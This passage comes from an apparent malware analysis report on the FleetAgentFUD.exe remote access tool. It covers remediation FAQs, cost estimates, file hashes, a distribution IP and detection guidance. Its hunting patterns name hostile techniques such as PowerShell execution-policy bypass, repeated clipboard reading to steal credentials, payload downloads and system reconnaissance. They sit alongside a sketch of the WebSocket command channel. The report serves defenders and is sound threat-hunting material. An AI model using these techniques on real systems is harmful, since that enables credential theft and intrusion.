Persistence	Quad-persistence (4 mechanisms)	No observed persistence
C2 Protocol	None observed (dormant)	WebSocket with registration + heartbeat
Key Capabilities	Dropper, persistence, thread injection APIs	PowerShell execution, clipboard theft, file download
Threat Model	Long-term access (weeks/months)	Real-time operations (minutes/hours)
Use Case	Pre-positioning for ransomware	Active C2 operations, credential theft

Q: What happens if I just kill the FleetAgentFUD.exe process?

A: Process termination may be sufficient (unlike FleetAgentAdvanced.exe):

GOOD NEWS:

• No observed persistence mechanisms (registry, scheduled tasks, startup folder)
• Network-dependent model (loses C2 when terminated)
• Simpler remediation vs persistence-focused malware

RISKS:

• Unknown persistence (analysis may not have captured all mechanisms)
• Downloaded payloads (ransomware, Cobalt Strike) may have independent persistence
• Credential compromise (clipboard data already stolen before termination)

Response Guidance:

1. Network isolation: Disconnect before termination (prevent C2 communication)
2. Forensic capture: Memory dump for evidence preservation
3. Process termination: Kill FleetAgentFUD.exe
4. Persistence scan: Check registry, scheduled tasks, startup folder
5. Payload scan: Search C:\Users\Public, C:\Windows\Temp, AppData
6. Credential rotation: MANDATORY for all users during infection window
7. Extended monitoring: 48-hour watch for reinfection/persistence activation

See: Detection Package for post-termination verification

For Business Decision-Makers

Q: What is the business impact of FleetAgentFUD.exe infection?

A: HIGH IMPACT - Complete remote system access with credential theft:

Immediate Costs (Per Infected System):

Investigation & Response:
- Forensic analysis: $600-$2,400
- System rebuild: $600-$1,800
- User downtime: $200-$600
- Credential rotation: $100-$300
Total Per System: $1,500-$5,100

Organizational Impact (50 Infected Systems):

Direct Costs:
- System remediation: $75,000-$255,000
- Credential rotation: $25,000
- Enhanced monitoring (90 days): $10,000-$20,000

Potential Data Breach:
- Ransomware deployment: $500,000-$5,000,000
- Regulatory fines (GDPR, HIPAA): $50,000-$1,000,000+
Total Potential Cost: $760,000-$7,000,000+

Business Risks:

• Credential Theft: Clipboard monitoring captures passwords, MFA tokens
• Ransomware Platform: File download enables ransomware deployment
• Espionage: PowerShell enables data exfiltration, IP theft
• Regulatory Exposure: GDPR, HIPAA, PCI-DSS violations
• Reputation Damage: Customer trust erosion if breach public

Q: Should we rebuild systems or just remove the malware?

A: REBUILD RECOMMENDED for confirmed infections:

Factor	Rebuild	Cleanup
Certainty of Removal	100% clean	70-85% confidence
Time Required	4-6 hours	2-4 hours + 48-hour validation
Reinfection Risk	0%	15-30%
Cost Per System	$1,500-$3,000	$800-$1,500
Residual Risk	NONE	MEDIUM

Rebuild Recommended:

• High-value systems (executives, finance, IT admins)
• Domain-joined with privileged access
• Access to sensitive data (PII, PHI, financial)
• Compliance requirements
• Long dwell time (>48 hours)

Cleanup Acceptable:

• Low-privilege standard user workstations
• Infection caught within 1-4 hours
• No secondary payload evidence
• Non-critical business function
• Budget constraints prevent mass rebuild

Q: How long can this malware remain undetected?

A: Variable dwell time - 1 hour to several weeks:

Best Case (Modern Security Controls):

Timeline:
- T+5 min: EDR detects unsigned .NET from AppData with network connection
- T+10 min: PowerShell bypass logged (EventID 4104)
- T+15 min: Security analyst receives SIEM alert
- T+30 min: System isolated, investigation initiated

Dwell Time: 30-60 minutes
Detection: Behavioral EDR + PowerShell logging + SIEM correlation

Worst Case (Minimal Security Controls):

Timeline:
- T+0 days: User executes FleetAgentFUD.exe
- T+1-7 days: No detection (AV bypassed by FUD design)
- T+14-30 days: IT investigates user-reported issues
- T+30+ days: Forensics confirms infection

Dwell Time: 2-4 weeks (or longer)
Detection: User report → Manual investigation

Factors Affecting Dwell Time: | Security Control | Dwell Time Reduction | |——————|———————| | EDR with Behavioral Detection | 90% reduction | | PowerShell Logging + SIEM | 80% reduction | | Network Traffic Analysis | 70% reduction | | User Awareness Training | 50% reduction | | Traditional Antivirus ONLY | 0% reduction |

Investment Recommendation: Organizations relying solely on signature-based AV are at MAXIMUM RISK for extended dwell time. Modern behavioral EDR is ESSENTIAL for detecting FUD-evading malware within hours instead of weeks.

---

IOCs

File Hashes

Primary Sample:

Filename:  FleetAgentFUD.exe
SHA256:    072ce701ec0252eeddd6a0501555296bce512a7b90422addbb6d3619ae10f4ff
SHA1:      51aa8b08dc67cb91435ce58d4453a8ae5e0dd577
MD5:       5b37f5fc42384834b7aac5081a5bac85
Size:      17,920 bytes (17.5 KB)
Type:      PE32 executable (GUI) Intel 80386, .NET compiled

Network Indicators

Distribution Infrastructure:

IP Address:     109.230.231.37
Service:        Open directory serving multiple malware families
Status:         ACTIVE (as of 2026-01-12)
Confidence:     CONFIRMED
Recommendation: BLOCK at network perimeter immediately

C2 Infrastructure:

Status:      NOT OBSERVED during static analysis
Assessment:  WebSocket-based C2; expect encrypted traffic over HTTPS (port 443)
Protocol:    WebSocket (ws:// or wss://)
Expected:    Custom authentication via "X-Agent-Secret" header
Monitoring:  Alert on WebSocket connections from .NET executables in AppData

Behavioral Indicators

Suspicious Behaviors to Hunt For:

1. PowerShell Execution Policy Bypass:
   • powershell.exe with -ExecutionPolicy Bypass or -Exec Bypass
   • Parent process: Suspicious .NET executable from AppData
   • Frequency: Repeated execution (clipboard monitoring every 5-60 seconds)
2. .NET Executable Network Activity:
   • Process: .NET executable from %APPDATA% or %LOCALAPPDATA%
   • Network: Outbound TCP connection to port 443 (wss:// WebSocket)
   • Protocol: WebSocket upgrade handshake (HTTP 101 Switching Protocols)
3. Clipboard Monitoring Pattern:
   • PowerShell command: Get-Clipboard
   • Frequency: 10+ executions per hour
   • Parent: Suspicious .NET process
4. WebSocket Protocol Indicators:
   • HTTP headers: Connection: Upgrade, Sec-WebSocket-Key, X-Agent-Secret
   • User-Agent: .NET WebClient (not typical browser User-Agent)
   • Certificate: Potentially self-signed or untrusted
5. File Download Activity:
   • WebClient.DownloadFile API calls from .NET executables
   • File creation in C:\Users\Public, C:\Windows\Temp, or AppData
   • Executable downloads (.exe, .dll, .scr) from untrusted sources
6. System Reconnaissance Commands:
   • PowerShell: Get-WmiObject Win32_*, Get-Process, Get-LocalUser, ipconfig /all
   • Parent: Suspicious .NET executable
   • Timing: Rapid-fire enumeration (multiple commands within minutes)

YARA Rules

See Detection Rules for complete YARA, Sigma, and hunting queries.

---

Detections

Detection Strategy Overview

FleetAgentFUD.exe can be detected through multiple complementary approaches:

File-Based Detection:

• Hash matching: SHA-256 signature (072ce701ec0252eeddd6a0501555296bce512a7b90422addbb6d3619ae10f4ff)
• YARA signatures: FUD malware patterns, WebSocket C2 strings, PowerShell bypass parameters
• Static analysis: Small file size (17.5 KB), .NET compilation, embedded C2 configuration strings

Behavioral Detection:

• PowerShell abuse: Repeated execution with “-Exec Bypass” parameters from AppData executables
• Clipboard monitoring: Get-Clipboard commands executed >10 times within short timeframe
• WebSocket C2: Connections to port 443 from AppData with WebSocket upgrade headers
• Payload download: File creation in Public/Temp folders followed by execution

Network Detection:

• WebSocket handshake: HTTP Upgrade requests with Sec-WebSocket-Key headers
• Custom authentication: X-Agent-Secret header in WebSocket connection
• C2 registration: JSON payloads containing machine_id, hostname, os_version fields
• TLS/SSL inspection: Encrypted WebSocket (wss://) connections from untrusted executables

PowerShell Logging (ESSENTIAL):

• Event 4104 (Script Block Logging): Captures “-Exec Bypass” and “Get-Clipboard” patterns
• Event 4103 (Module Logging): Reveals PowerShell cmdlet usage
• Repeated pattern detection: Multiple PowerShell spawns from same parent process

Forensic Artifacts:

• Process creation events (Sysmon 1): powershell.exe spawned by AppData executable
• Network connections (Sysmon 3): WebSocket connections from user-writable directories
• File creation (Sysmon 11): Downloaded payloads in Public/Temp folders
• PowerShell logs: Execution Policy bypass and clipboard access patterns

Comprehensive Detection Rules: For complete YARA signatures, Sigma rules, EDR queries, PowerShell hunting scripts, SIEM correlation rules, and network signatures:

• FleetAgentFUD.exe Detection Package →

• Machine-Readable IOC Feed (JSON) →

License

© 2026 Joseph. All rights reserved. Free to read, but reuse requires written permission.